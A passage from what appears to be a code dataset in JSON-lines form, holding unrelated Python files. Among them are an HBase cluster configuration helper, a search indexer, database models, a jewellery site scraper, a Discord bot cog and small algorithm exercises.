commands to run after prerun (all vms or local) for checking if everything runs correctly (systemctl start xyz oftern returns true even if start failed somehow. Check that here!)\n# check_master -> list of commands to run after prerun (all vms or local) for checking if everything runs correctly (only on master(first=ID 0) vm or local))\n# check_slaves -> list of commands to run after prerun (all vms or local) for checking if everything runs correctly (all without master(=ID 0)) vms or local))\n# check_dict -> list of commands to run after prerun for each db vm (key=number of vm) (without ycsb, sync or space diff or poweroff commands!) (%%SSH%% not needed)\n# include -> which base modules should be imported and added to the dictionary (standard functions that are reusable). Warning: infinite import loop possible!\n# the following variables are possible in prerun_once, postrun_once, prerun, prerun_master, prerun_slaves, check, check_master, check_slaves, postrun, postrun_master, postrun_slaves, prerun_dict, postrun_dict, check_dict, db_args:\n# %%IP%% -> IP of (actual) db vm\n# %%IPgen%% -> IP of (actual) generator vm (on which this script runs)\n# %%IPn%% -> IP of db vm number n (e.g. %%IP2%%)\n# %%IPall%% -> give String with IP of all vms)\n# %%HN%% -> Hostname of (actual) db vm\n# %%HNgen%% -> Hostname of (actual) generator vm (on which this script runs)\n# %%HNn%% -> Hostname of db vm number n (e.g. %%HN2%%)\n# %%HNall%% -> give String with Hostname of all vms)\n# %%SSH%% -> if SSH should be used (set at the beginning)\n# Order of Preruns/Postruns:\n# 1. prerun/postrun/check, 2. prerun_master/postrun_master/check_master, 3. preun_skaves/postrun_slaves/check_slaves, 4.prerun_dict/postrun_dict/check_dict\n# General Order:\n# prerun -> check -> ycsb -> postrun\n\n# this configures hbase\n\ndef getDict():\n baseConfig={}\n baseConfig[\"db_folders\"]=[]\n baseConfig[\"prerun_once\"]= []\n baseConfig[\"postrun_once\"]= []\n baseConfig[\"prerun\"] = [\n \"%%SSH%%sudo -s bash -c 'sed -i \\\"s|#tsd.storage.hbase.zk_quorum = localhost|tsd.storage.hbase.zk_quorum = %%HN0%%,%%HN1%%,%%HN2%%,%%HN3%%,%%HN4%%|\\\" /etc/opentsdb/opentsdb.conf'\",\n \"%%SSH%%sudo -s bash -c 'sed -i \\\"s||\\\\n \\\\n hbase.rootdir\\\\n hdfs://%%HN0%%:54310/hbase\\\\n \\\\n \\\\n hbase.cluster.distributed\\\\n true\\\\n \\\\n \\\\n hbase.zookeeper.quorum\\\\n %%HN0%%,%%HN1%%,%%HN2%%,%%HN3%%,%%HN4%%\\\\n \\\\n \\\\n hbase.zookeeper.property.dataDir\\\\n /home/vagrant/zookeeper\\\\n |g\\\" /home/vagrant/hbase/conf/hbase-site.xml'\",\n \"%%SSH%%sudo -s bash -c 'sed -i \\\"s|localhost|%%HN1%%\\\\n%%HN2%%\\\\n%%HN3%%\\\\n%%HN4%%|\\\" /home/vagrant/hbase/conf/regionservers'\",\n \"%%SSH%%sudo -s bash -c 'echo -e \\\"%%HN1%%\\\\n%%HN2%%\\\" >> /home/vagrant/hbase/conf/backup-masters'\"\n ]\n baseConfig[\"postrun\"]= []\n baseConfig[\"prerun_master\"]= []\n baseConfig[\"postrun_master\"]= []\n baseConfig[\"prerun_slaves\"]= []\n baseConfig[\"postrun_slaves\"]= []\n baseConfig[\"prerun_dict\"]= {}\n baseConfig[\"postrun_dict\"]= {}\n baseConfig[\"check\"]= []\n baseConfig[\"check_master\"]= []\n baseConfig[\"check_slaves\"]= []\n baseConfig[\"check_dict\"]= {}\n baseConfig[\"include\"] = []\n return baseConfig","repo_name":"TSDBBench/Overlord","sub_path":"vagrant_files/generator/files/databases/base/hbase.py","file_name":"hbase.py","file_ext":"py","file_size_in_byte":5119,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"36243229390","text":"import xapian as xa\nimport os\nimport json\nimport gzip\nimport itertools\nfrom time import time\nimport indexer as idx\nfrom pprint import pprint\n\nroot = os.environ['DATA']\n\ndef datasets():\n path = os.path.join(root, 'usertables_schema')\n suffix = '_schema.json'\n for f in sorted(os.listdir(path)):\n if f.endswith(suffix):\n yield f[:-len(suffix)]\n\ndef get_schema_content(id):\n path = os.path.join(root, 'usertables_schema', '%s_schema.json' % id)\n with open(path, 'rb') as f:\n return f.read()\n\ndef get_data_lines(id, limit=10):\n path = os.path.join(root, 'usertables_data', '%s.json.gz' % id)\n with gzip.open(path, 'r') as f:\n for (i, line) in enumerate(f):\n if limit and i < limit:\n yield line\n else:\n break\n\nif __name__ == '__main__':\n index_data = True\n\n path = os.path.join(root, 'xapian_index')\n db = xa.WritableDatabase(path, xa.DB_CREATE_OR_OPEN)\n indexer = xa.TermGenerator()\n\n total = 0\n for _ in datasets():\n total += 1\n\n start = time()\n for i, id in enumerate(datasets()):\n raw_schema = get_schema_content(id)\n schema = json.loads(raw_schema)\n text = idx.stringify(schema, stemmer=idx.word_stemmer)\n\n doc = xa.Document()\n\n # adding terms from schema\n indexer.set_document(doc)\n indexer.index_text(text, 1,'S')\n\n doc.add_value(0, id)\n doc.add_value(1, raw_schema)\n\n # adding terms from \n if index_data:\n lines = list(get_data_lines(id, limit=1000))\n for line in lines:\n data = json.loads(line)\n text = \" \".join(str(x) for x in data.values())\n indexer.index_text_without_positions(text, 1, 'D')\n doc.add_value(2, \"\\n\".join(x.decode('utf-8') for x in lines))\n \n db.add_document(doc)\n if i and i % 100 == 0:\n db.commit()\n print(\"[%d] in %.2f seconds.\" % (i, time() - start))\n\n db.commit()\n","repo_name":"RJMillerLab/opendata-keyword-search","sub_path":"server/build_index.py","file_name":"build_index.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38607612958","text":"import os, sys\r\n\r\nfrom sqlalchemy import Column, ForeignKey, Integer, String, Table\r\nfrom sqlalchemy.ext.declarative import declarative_base\r\nfrom sqlalchemy.orm import relationship\r\nfrom sqlalchemy import create_engine\r\nfrom datetime import datetime\r\nfrom flask_sqlalchemy import SQLAlchemy\r\n\r\ndb = SQLAlchemy()\r\nBase = declarative_base()\r\n\r\n#Making an API Endpoint (GET Request)\r\n\r\nclass Category(Base):\r\n\t__tablename__ = 'Category'\r\n\tname = db.Column(String(80), nullable = False)\r\n\tid = db.Column(Integer, primary_key = True)\r\n\t#books = relationship('Book', backref='category', lazy=True)\r\n\r\n\tdef __init__(self, name):\r\n\t\tself.name = name\r\n\r\n\tdef __repr__(self):\r\n\t\treturn self.name\r\n\r\nassociation_table = Table('association', Base.metadata,\r\n\tdb.Column('book_id', Integer, ForeignKey('Book.id')),\r\n\tdb.Column('form_id', Integer, ForeignKey('Form.id'))\r\n\t)\r\n\r\nclass Book(Base):\r\n\t__tablename__ = 'Book'\r\n\tname = db.Column(String(80), nullable = False, unique=True)\r\n\tid = db.Column(Integer, primary_key = True)\r\n\tauthor = db.Column(String(30))\r\n\tlanguage = db.Column(String(30))\r\n\tcategory_id = db.Column(Integer, ForeignKey('Category.id'), nullable = False)\r\n\tcategory = db.relationship('Category')\r\n\tforms = db.relationship(\"Form\", secondary=association_table, back_populates=\"books\")\r\n\r\n\tdef __repr__(self):\r\n\t\treturn '' % self.name\r\n\r\nclass Form(Base):\r\n\t__tablename__ = 'Form'\r\n\tname = db.Column(String, nullable = False)\r\n\tid = db.Column(Integer, primary_key=True)\r\n\tbooks = db.relationship(\"Book\", secondary=association_table, back_populates=\"forms\")\r\n\r\n\tdef __init__(self, name):\r\n\t\tself.name = name\r\n\r\n\tdef __repr__(self):\r\n\t\treturn self.name\r\n\r\n### insert at end of file ###\r\nengine = create_engine('sqlite:///allbooks.db')\r\nBase.metadata.create_all(engine)","repo_name":"3Cement/MyLibrary-Flask","sub_path":"mylibrary_database.py","file_name":"mylibrary_database.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30263273355","text":"from src.data.scraping.parsers.base import BaseJewelParser, JewelLoader\nfrom src.data.scraping.processors import TakeMax\n\n\nclass SokolovRuJewelLoader(JewelLoader):\n \"\"\"\n Sokolov.ru jewels sometimes possess length property, which is\n considered as height and appended to the list of height property\n values. In this case height denotes the thickness and is usually\n smaller than the length. We don't need the thickness value to be\n present in height property, so we choose the length by taking the\n maximum over the list of height values.\n \"\"\"\n height_out = TakeMax()\n\n\nclass SokolovRuJewelParser(BaseJewelParser):\n \"\"\"\n Parser class for sokolov.ru product pages for mining jewel data.\n All these product pages have two common main blocks:\n - A div of .product class with data-list-id=product attribute.\n Contains main product info: title, price, category, images etc.\n - A div with id=props.\n Contains the detailed description of specific jewel properties:\n physical characteristics (metal, probe, gem inserts, weight,\n width, height, etc.), collection, free-form description etc.\n \"\"\"\n loader_cls = SokolovRuJewelLoader\n\n def __init__(self, response):\n super(SokolovRuJewelParser, self).__init__(response)\n # Main product info\n self.product = response.css('.product[data-list-id=product]')\n # Specific product properties\n self.props = response.css('#props')\n\n def parse_image_urls(self):\n \"\"\"\n Get main image url from data-src attribute of the image\n marked with contentUrl itemprop attribute.\n \"\"\"\n urls = self.product.css(\n 'img[itemprop=contentUrl]::attr(data-src)'\n ).get()\n self.loader.add_value('image_urls', urls)\n\n def parse_title(self):\n \"\"\"Get title from h1 data-detail-name attribute\"\"\"\n title = self.product.css('h1::attr(data-detail-name)').get()\n self.loader.add_value('title', title)\n\n def parse_category(self):\n \"\"\"\n Get category from the data-detail-category attribute of the\n main div.product block. This attribute value is organized in\n granular way \"category / sub-category / sub-sub-category / ...\".\n Thus the value is split by slash and the second item is taken,\n if present (since the first item represents too generic name),\n otherwise the default value is returned.\n \"\"\"\n category = self.product.css(\n '.product[data-list-id=product]::attr(data-detail-category)'\n ).get() or 'Ювелирные украшения'\n\n categories = category.split('/')\n category = categories[1] if len(categories) > 1 else categories[0]\n self.loader.add_value('category', category)\n\n def parse_sku(self):\n \"\"\"Get product id from the meta-tag with sku itemprop\"\"\"\n sku = self.product.css('meta[itemprop=sku]::attr(content)').get()\n self.loader.add_value('sku', sku)\n\n def parse_price(self):\n \"\"\"Get price from the meta-tag with price itemprop\"\"\"\n price = self.product.css('meta[itemprop=price]::attr(content)').get()\n self.loader.add_value('price', price)\n\n def parse_currency(self):\n \"\"\"Get currency from the meta-tag with priceCurrency itemprop\"\"\"\n currency = self.product.css(\n 'meta[itemprop=priceCurrency]::attr(content)'\n ).get()\n self.loader.add_value('currency', currency)\n\n def parse_description(self):\n \"\"\"\n There are two types of description provided with sokolov.ru\n products: about the product itself (target one) and about the\n brand (non-relevant). In div#props they are placed in two \"tab\"\n blocks (or in a single one in case only the brand description\n is provided). Here, the tab names are extracted and the text\n corresponding to the pure product description tab is returned.\n \"\"\"\n tab_names = self.props.css('.tab-header-item > p::text').getall()\n tab_texts = self.props.css('.props.wrap-text-show > p::text').getall()\n\n description_tab_name = 'Об украшении'\n if description_tab_name in tab_names:\n description = tab_texts[tab_names.index(description_tab_name)]\n self.loader.add_value('description', description)\n\n @staticmethod\n def _list_props(element, name_in_span=True, value_in_span=True):\n \"\"\"\n Iterates over item blocks with names and values in props list\n inside the div#props container and generates (name, value) pairs.\n Each item consists of two divs: one of .name class and another\n one of .val class. These blocks contain names and values of jewel\n properties optionally wrapped with span blocks.\n :param element: scrapy's SelectorList\n The container element of the list of properties.\n :param name_in_span: bool\n Indicator of whether the name is wrapped with a span block.\n :param value_in_span:\n Indicator of whether the value is wrapped with a span block.\n :return:\n Nothing, but (name, value) pairs are generated.\n \"\"\"\n name_selector = '.name > span::text' if name_in_span else '.name::text'\n value_selector = '.val > span::text' if value_in_span else '.val::text'\n\n for prop in element.css('.props-list'):\n name = prop.css(name_selector).get() or ''\n value = prop.css(value_selector).get() or ''\n yield name.strip(), value.strip()\n\n def parse_props_list(self):\n \"\"\"\n Parse the detailed list of all known jewel properties by\n iterating over the list. Since almost all properties are\n concentrated in a single list, it's more convenient to parse\n them in one method by iterating the entire list rather than\n querying the list for each property separately.\n \"\"\"\n for name, value in self._list_props(self.props):\n if name == 'Коллекция':\n self.loader.add_value('collection', value)\n elif name == 'Бренд':\n self.loader.add_value('brand', value)\n elif name == 'Для кого':\n self.loader.add_value('for_whom', value)\n elif name == 'Тип металла':\n self.loader.add_value('metal', value)\n elif name == 'Проба':\n self.loader.add_value('probe', value)\n elif name == 'Примерный вес':\n self.loader.add_value('weight', value.split()[0])\n elif name == 'Ширина':\n self.loader.add_value('width', value.split()[0])\n elif name == 'Высота':\n self.loader.add_value('height', value.split()[0])\n elif name == 'Длина':\n # sokolov.ru jewels sometimes also possess length property,\n # in such case height denotes the thickness and is usually\n # smaller than the length. For our purposes, we need only\n # two dimensions: width and height, and so we consider the\n # length as height in such cases.\n self.loader.add_value('height', value.split()[0])\n\n @staticmethod\n def _compose_gem_description(props):\n \"\"\"\n Composes a sentence-description of a single certain type of gem\n inserts. The description is a string of the following format\n (square brackets denote optional parts):\n , [, color: ...][, faceting: ...]\n [, form: ...][, quality: /][, weight]\n :param props: dict\n Dictionary of the form gem property name -> property value.\n :return: str, the desired description\n \"\"\"\n gem_desc_parts = [props['Тип'], props['Количество']]\n\n if 'Цвет' in props:\n gem_desc_parts.append(f'цвет {props[\"Цвет\"].lower()}')\n if 'Огранка' in props:\n gem_desc_parts.append(f'огранка {props[\"Огранка\"]}')\n if 'Форма' in props:\n gem_desc_parts.append(f'форма {props[\"Форма\"].lower()}')\n\n if 'Цветность' in props and 'Чистота' in props:\n chromaticity, purity = props['Цветность'], props['Чистота']\n gem_desc_parts.append(f'качество {chromaticity}/{purity}')\n\n if 'Вес' in props:\n gem_desc_parts.append(f'вес {props[\"Вес\"]}')\n\n return ', '.join(gem_desc_parts)\n\n def parse_props_insert(self):\n \"\"\"\n Iterates over the special type of list of properties - the list\n of gem inserts - and composes the comprehensive description of\n all jewel gems by concatenating the sentences-descriptions of\n individual gems.\n \"\"\"\n gem_descs = []\n for insert in self.props.css('.props-insert__item'):\n insert_props = dict(self._list_props(insert, name_in_span=False))\n gem_descs.append(self._compose_gem_description(insert_props))\n\n if gem_descs:\n self.loader.add_value('gems', '. '.join(gem_descs))\n\n def parse_metal(self):\n # `metal` value is parsed in `parse_props_list`\n pass\n\n def parse_probe(self):\n # `probe` value is parsed in `parse_props_list`\n pass\n\n def parse_brand(self):\n # `brand` value is parsed in `parse_props_list`\n pass\n\n def parse(self):\n \"\"\"\n Parses the detailed list of jewel properties (including gem\n inserts) first, and all the rest attributes then.\n \"\"\"\n self.parse_props_list()\n self.parse_props_insert()\n return super(SokolovRuJewelParser, self).parse()\n","repo_name":"IlyaKachan/jewelsim","sub_path":"src/data/scraping/parsers/sokolov_ru.py","file_name":"sokolov_ru.py","file_ext":"py","file_size_in_byte":9833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18093482011","text":"import os\nimport time\n\nimport cv2\nfrom termcolor import colored\n\nfrom DTOs.AnomalyDTO import AnomalyDTO\nfrom DataManagment.CacheManager import get_cache_manager_instance\nfrom Logics.ClassificationLogic import get_classification_logic_instance\n\n\nclass ClassificationService:\n def __init__(self):\n self._cacheManager = get_cache_manager_instance()\n self._classificationLogic = get_classification_logic_instance()\n\n def start_service(self):\n print(colored(\"classification service started on process \" + str(os.getpid()), 'blue', 'on_grey', attrs=['bold']))\n while True:\n toClassifyAnomalyDTO = self._cacheManager.get_oldest_to_classify_anomaly_cache()\n if toClassifyAnomalyDTO is None:\n time.sleep(1)\n continue\n frame = cv2.imread('cache/' + toClassifyAnomalyDTO.image_uri)\n is_anomaly, confidences = self._classificationLogic.is_anomaly_and_confidences(frame)\n self._cacheManager.delete_to_classify_anomaly(toClassifyAnomalyDTO.id)\n if is_anomaly:\n print(colored(\"anomaly detected \" + toClassifyAnomalyDTO.image_uri + \" pothole: \" + str(confidences[0]) + \" bump \" + str(confidences[1])\n + \" manhole \" + str(confidences[2]) + \" roadcrack \" + str(confidences[3]), 'cyan', 'on_grey', attrs=['bold']))\n self._cacheManager.cache_anomaly(AnomalyDTO(0, confidences[0], confidences[1], confidences[2],\n confidences[3], toClassifyAnomalyDTO.lat, toClassifyAnomalyDTO.lng,\n toClassifyAnomalyDTO.image_uri, toClassifyAnomalyDTO.created_at))\n else:\n print(\n colored(\"frame isn't a anomaly\" + toClassifyAnomalyDTO.image_uri, 'blue', 'on_grey', attrs=['bold']))\n self._cacheManager.delete_image(toClassifyAnomalyDTO.image_uri)\n","repo_name":"OmarMaysour/RoadEye","sub_path":"Services/ClassificationService.py","file_name":"ClassificationService.py","file_ext":"py","file_size_in_byte":1954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74522036968","text":"import sys\n\nN, M = map(int, sys.stdin.readline().split())\ncardlist = list(map(int, sys.stdin.readline().split()))\nsum = 0\n\nfor i in range(0, N-2):\n for ii in range(i+1, N-1):\n for iii in range(ii+1, N):\n if cardlist[i] + cardlist[ii] + cardlist[iii] > M:\n continue\n else:\n sum = max(sum, cardlist[i] + cardlist[ii] + cardlist[iii])\n\nprint(sum)\n\n\n \n\n","repo_name":"silentcat21/BAEKJOON","sub_path":"브루트 포스/2798.py","file_name":"2798.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"2870868848","text":"import sys\nfrom collections import deque\n\ninput = sys.stdin.readline\n\nN = int(input())\n\nmap_ = [list(map(int, input().split())) for _ in range(N)]\n\nall_land_idx = []\n\nfor i in range(N):\n for j in range(N):\n if map_[i][j]: all_land_idx.append((i, j))\n\ndi, dj = [-1, 1, 0, 0], [0, 0, -1, 1]\n\nremain_land = set(all_land_idx[:])\ngroup_data = dict()\n\ndef grouping(start):\n queue = deque([start])\n grouped_idx = set()\n\n while queue:\n i, j = queue.popleft()\n\n map_[i][j] = group_number\n group_data[(i, j)] = group_number\n grouped_idx.add((i, j))\n\n for k in range(4):\n next_i, next_j = i+di[k], j+dj[k]\n if 0 <= next_i < N and 0 <= next_j < N and map_[next_i][next_j] == 1:\n queue.append((next_i, next_j))\n\n queue = []\n\n return grouped_idx\n\ngroup_number = 2\nwhile remain_land:\n remain_land -= grouping(remain_land.pop())\n group_number += 1\n\nmap_ = []\n\ndef step(start):\n queue = deque([(0, *start)])\n\n while queue:\n count, i, j = queue.popleft()\n\n for k in range(4):\n next_i, next_j = i+di[k], j+dj[k]\n\n if 0 <= next_i < N and 0 <= next_j < N:\n if (next_i, next_j) not in group_data:\n queue.append((count+1, next_i, next_j))\n\n elif group_data[start] != group_data[(next_i, next_j)]:\n return count\n\n return 10000\n\nresult = 10000\nfor start in all_land_idx:\n result = min(result, step(start))\n\nprint(result)\n","repo_name":"SimplePro/Algorithm","sub_path":"다리 만들기.py","file_name":"다리 만들기.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4693147438","text":"# coding: utf-8\n\nimport os\nfrom supervisely_lib.io.json import load_json_file\nimport supervisely_lib as sly\n\n\nclasses_dict = sly.ObjClassCollection()\n\n\ndef read_datasets(coord_file, dataset):\n src_datasets = {}\n if not os.path.isfile(coord_file):\n raise RuntimeError('There is no file {}, but it is necessary'.format(coord_file))\n sample_names = []\n with open(coord_file, \"r\") as file:\n all_lines = file.readlines()\n for line in all_lines:\n line = line.strip('\\n').split(',')[0]\n if line[0] != 'w':\n line = line[1:]\n sample_names.append(line[:-4])\n src_datasets[dataset] = sample_names\n sly.logger.info('Found source dataset with {} sample(s).'.format(len(sample_names)))\n return src_datasets\n\n\ndef read_words(word_file):\n words = {}\n with open(word_file, \"r\") as file:\n all_lines = file.readlines()\n for line in all_lines:\n word = line.strip('\\n').split(',')[1][2:-1]\n name = line.strip('\\n').split(',')[0]\n if name[0] != 'w':\n name = name[1:]\n words[name] = word\n return words\n\n\ndef read_coords(coord_file):\n coords = {}\n with open(coord_file, \"r\") as file:\n all_lines = file.readlines()\n for line in all_lines:\n name = line.strip('\\n').split(',')[0]\n line = line.strip('\\n').split(',')[1:]\n if name[0] != 'w':\n name = name[1:]\n line = list(map(lambda i: int(i), line))\n coords[name] = line\n return coords\n\n\ndef get_ann(img_path, coords, words):\n global classes_dict\n ann = sly.Annotation.from_img_path(img_path)\n class_name = 'text'\n color = [255, 0, 0]\n name = img_path.split('/')[-1]\n line = coords[name]\n points = [sly.PointLocation(line[i + 1], line[i]) for i in range(0, 8, 2)]\n polygon = sly.Polygon(exterior=points, interior=[])\n if not classes_dict.has_key(class_name):\n obj_class = sly.ObjClass(name=class_name, geometry_type=sly.Polygon, color=color)\n classes_dict = classes_dict.add(obj_class) # make it for meta.json\n ann = ann.add_label(sly.Label(polygon, classes_dict.get(class_name), None, words[name]))\n return ann\n\n\ndef convert():\n settings = load_json_file(sly.TaskPaths.TASK_CONFIG_PATH)\n out_project = sly.Project(os.path.join(sly.TaskPaths.RESULTS_DIR, settings['res_names']['project']),\n sly.OpenMode.CREATE)\n for dataset in ['train', 'test']:\n if dataset == 'train':\n imgs_dir = os.path.join(sly.TaskPaths.DATA_DIR, 'ch4_training_word_images_gt')\n coord_file = os.path.join(sly.TaskPaths.DATA_DIR, 'ch4_training_word_images_gt/coords.txt')\n word_file = os.path.join(sly.TaskPaths.DATA_DIR, 'ch4_training_word_images_gt/gt.txt')\n else:\n imgs_dir = os.path.join(sly.TaskPaths.DATA_DIR, 'ch4_test_word_images_gt')\n coord_file = os.path.join(sly.TaskPaths.DATA_DIR, 'ch4_test_word_images_gt/coords.txt')\n word_file = os.path.join(sly.TaskPaths.DATA_DIR, 'ch4_test_word_images_gt/gt.txt')\n\n src_datasets = read_datasets(coord_file, dataset)\n words = read_words(word_file)\n coords = read_coords(coord_file)\n for ds_name, sample_names in src_datasets.items():\n ds = out_project.create_dataset(ds_name) #make train -> img, ann\n progress = sly.Progress('Dataset: {!r}'.format(ds_name), len(sample_names)) # for logger\n for name in sample_names:\n src_img_path = os.path.join(imgs_dir, name + '.png')\n\n if all((os.path.isfile(x) or (x is None) for x in [src_img_path])):\n ann = get_ann(src_img_path, coords, words)\n ds.add_item_file(name, src_img_path, ann=ann)\n progress.iter_done_report()\n\n out_meta = sly.ProjectMeta(obj_classes=classes_dict)\n out_project.set_meta(out_meta)\n\n\ndef main():\n convert()\n sly.report_import_finished()\n\n\nif __name__ == '__main__':\n sly.main_wrapper('Incidentalscene2', main)\n","repo_name":"juzisedefeimao/supervisely","sub_path":"plugins/import/Incidentalscene2/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"3254167013","text":"import asyncio\nimport logging\nimport os\nimport aiomysql\nimport imgkit\nimport discord\nimport traceback\nimport concurrent.futures\nimport functools\nfrom discord.ext import commands, tasks\nfrom yagoo.lib.dataUtils import botdb\n\nasync def milestoneCheck(pool: aiomysql.Pool):\n db = await botdb.getDB(pool)\n channels = await botdb.getAllData(\"channels\", (\"id\", \"name\", \"milestone\", \"image\"), db=db)\n scrape = await botdb.getAllData(\"scrape\", (\"id\", \"roundSubs\", \"mbanner\"), keyDict=\"id\", db=db)\n \n async def getSubs(channel: tuple, scrape: dict):\n if channel[\"milestone\"] < scrape[\"roundSubs\"]:\n if scrape[\"roundSubs\"] < 1000000:\n subtext = f'{int(scrape[\"roundSubs\"] / 1000)}K Subscribers'\n else:\n if scrape[\"roundSubs\"] == scrape[\"roundSubs\"] - (scrape[\"roundSubs\"] % 1000000):\n subtext = f'{int(scrape[\"roundSubs\"] / 1000000)}M Subscribers'\n else:\n subtext = f'{scrape[\"roundSubs\"] / 1000000}M Subscribers'\n return {\n \"id\": channel[\"id\"],\n \"name\": channel[\"name\"],\n \"image\": channel[\"image\"],\n \"banner\": scrape[\"mbanner\"],\n \"msText\": subtext,\n \"roundSubs\": scrape[\"roundSubs\"]\n }\n return None\n \n queue = []\n for channel in channels:\n if channel[\"id\"] in scrape:\n queue.append(getSubs(channel, scrape[channel[\"id\"]]))\n \n milestone = {}\n dbUpdate = []\n write = False\n results = await asyncio.gather(*queue)\n for result in results:\n if result:\n milestone[result[\"id\"]] = result\n dbUpdate.append((result[\"id\"], result[\"roundSubs\"]))\n write = True\n \n if write:\n await botdb.addMultiData(dbUpdate, (\"id\", \"milestone\"), \"channels\", db)\n \n return milestone\n\nasync def milestoneNotify(msDict: dict, bot: commands.Bot, maintenance: bool):\n db = await botdb.getDB(bot.pool)\n servers = await botdb.getAllData(\"servers\", (\"channel\", \"milestone\"), db=db)\n queue = []\n \n async def postMsg(channel: str, server: tuple):\n try:\n if not maintenance:\n await bot.get_channel(int(server[\"channel\"])).send(f'{msDict[channel][\"name\"]} has reached {msDict[channel][\"msText\"].replace(\"Subscribers\", \"subscribers\")}!', file=discord.File(f'milestone/generated/{channel}.png'))\n await bot.get_channel(int(server[\"channel\"])).send(\"おめでとう!\")\n else:\n print(f\"Milestone Post on {server['channel']}:\\n{msDict[channel]['name']} has reached {msDict[channel]['msText'].replace('Subscribers', 'subscribers')}!\\n\")\n except Exception as e:\n logging.error(\"Milestone - Failed to post on a server/channel!\", exc_info=True)\n \n for channel in msDict:\n if msDict[channel][\"banner\"] is not None:\n with open(\"milestone/milestone.html\") as f:\n msHTML = f.read()\n else:\n msDict[channel][\"banner\"] = \"\"\n with open(\"milestone/milestone-nobanner.html\") as f:\n msHTML = f.read()\n options = {\n \"enable-local-file-access\": \"\",\n \"encoding\": \"UTF-8\",\n \"quiet\": \"\"\n }\n msHTML = msHTML.replace('[msBanner]', msDict[channel][\"banner\"]).replace('[msImage]', msDict[channel][\"image\"]).replace('[msName]', msDict[channel][\"name\"]).replace('[msSubs]', msDict[channel][\"msText\"])\n with open(f\"milestone/{channel}.html\", \"w\", encoding=\"utf-8\") as f:\n f.write(msHTML)\n if not os.path.exists(\"milestone/generated\"):\n os.mkdir(\"milestone/generated\")\n imgkit.from_file(f\"milestone/{channel}.html\", f'milestone/generated/{channel}.png', options=options)\n os.remove(f\"milestone/{channel}.html\")\n for server in servers:\n milestone = await botdb.listConvert(server[\"milestone\"])\n if milestone:\n if channel in milestone:\n queue.append(postMsg(channel, server))\n \n await asyncio.gather(*queue)\n\ndef mcWrapper(pool: aiomysql.Pool):\n return asyncio.run(milestoneCheck(pool))\n\nclass msCycle(commands.Cog):\n def __init__(self, bot, maintenance):\n self.bot = bot\n self.maintenance = maintenance\n \n @commands.Cog.listener()\n async def on_ready(self):\n self.timecheck.start()\n\n def cog_unload(self):\n self.timecheck.cancel()\n\n @tasks.loop(minutes=3.0)\n async def timecheck(self):\n logging.info(\"Starting milestone checks.\")\n try:\n with concurrent.futures.ThreadPoolExecutor() as pool:\n loop = asyncio.get_running_loop()\n msData = await loop.run_in_executor(pool, functools.partial(mcWrapper, self.bot.pool))\n if msData != {}:\n logging.info(\"Milestone - Notifying channels.\")\n await milestoneNotify(msData, self.bot, self.maintenance)\n except Exception as e:\n logging.error(\"Milestone - An error has occured in the cog!\", exc_info=True)\n traceback.print_exception(type(e), e, e.__traceback__)\n else:\n logging.info(\"Milestone checks done.\")\n","repo_name":"ProgrammingPleb/yagoo_bot","sub_path":"yagoo/cogs/msCycle.py","file_name":"msCycle.py","file_ext":"py","file_size_in_byte":5273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44182788702","text":"\"\"\"\r\nCase9–. Даны два целых числа: D (день) и M (месяц), определяющие правильную дату невисокосного года. Вывести значения D и M для даты,\r\nследующей за указанной\r\n\"\"\"\r\n\r\nD = int(input(\"Введите число: D - \"))\r\nM = int(input(\"Введите число: M - \"))\r\n\r\nCountDay = 0\r\n\r\nif M == 2:\r\n\tCountDay = 28\r\nelif M == 4 or M == 6 or M == 9 or M == 11:\r\n\tCountDay = 30\r\nelif M == 1 or M == 3 or M == 5 or M == 7 or M == 8 or M == 10 or M == 12:\r\n\tCountDay = 31\r\n\r\nif D < CountDay:\r\n\tD += 1\r\nelse:\r\n\tM = (M % 12) + 1\r\n\tD = 1\r\n\r\nprint(D)\r\nprint(M)\r\n","repo_name":"666sempron999/Abramyan-tasks-","sub_path":"case(20)/9.py","file_name":"9.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12595487807","text":"\r\nclass Weapon:\r\n def prick(self, obj): # 这是该装备的主动技能,扎死对方\r\n obj.life_value -= 500 # 假设攻击力是500\r\n\r\nclass Person: # 定义一个人类\r\n role = 'person' # 人的角色属性都是人\r\n\r\n def __init__(self, name, atk, life_value):\r\n self.name = name # 每一个角色都有自己的昵称;\r\n self.atk = atk # 每一个角色都有自己的攻击力;\r\n self.life_value = life_value # 每一个角色都有自己的生命值;\r\n self.weapon = Weapon() # 给角色绑定一个武器;\r\n\r\n def walk(self):\r\n print(self.name + ' is walking...')\r\n\r\n\r\n def attack(self, dog):\r\n # 人可以攻击狗,这里的狗也是一个对象。\r\n # 人攻击狗,那么狗的生命值就会根据人的攻击力而下降\r\n dog.life_value -= self.atk\r\n\r\n\r\nclass Dog: # 定义一个狗类\r\n role = 'dog' # 狗的角色属性都是狗\r\n\r\n def __init__(self, name, breed, atk, life_value):\r\n self.name = name # 每一只狗都有自己的昵称;\r\n self.breed = breed # 每一只狗都有自己的品种;\r\n self.atk = atk # 每一只狗都有自己的攻击力;\r\n self.life_value = life_value # 每一只狗都有自己的生命值;\r\n\r\n def bite(self, people):\r\n print('dog bites the person')\r\n # 狗可以咬人,这里的狗也是一个对象。\r\n # 狗咬人,那么人的生命值就会根据狗的攻击力而下降    \r\n people.life_value -= self.atk\r\n\r\n\r\nprint(Person.role) # 